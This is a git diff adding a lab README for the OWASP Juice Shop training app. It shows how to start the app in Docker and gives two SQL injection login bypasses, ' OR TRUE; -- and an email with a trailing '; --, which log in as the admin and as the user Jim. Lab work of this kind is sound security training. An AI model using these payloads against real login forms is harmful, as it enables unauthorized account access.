diff --git a/Lab03 - Let's Buy Some Juice/README.md b/Lab03 - Let's Buy Some Juice/README.md new file mode 100644 index 0000000..2c13955 --- /dev/null +++ b/Lab03 - Let's Buy Some Juice/README.md @@ -0,0 +1,22 @@ +# Let's Buy Some Juice +## Booting Up Juice Shop +```sh +docker run --pull always -p 127.0.0.1:80:3000 bkimminich/juice-shop +``` + +## SQL Injection +### Login as Admin + 1. Open `Account` => `Login` + 2. Type `' OR TRUE; --` into `Email` and any password in `Password` + +Result: + + + +### Login as Jim + 1. Open `Account` => `Login` + 2. Type `jim@juice-sh.op'; --` + +Result: + +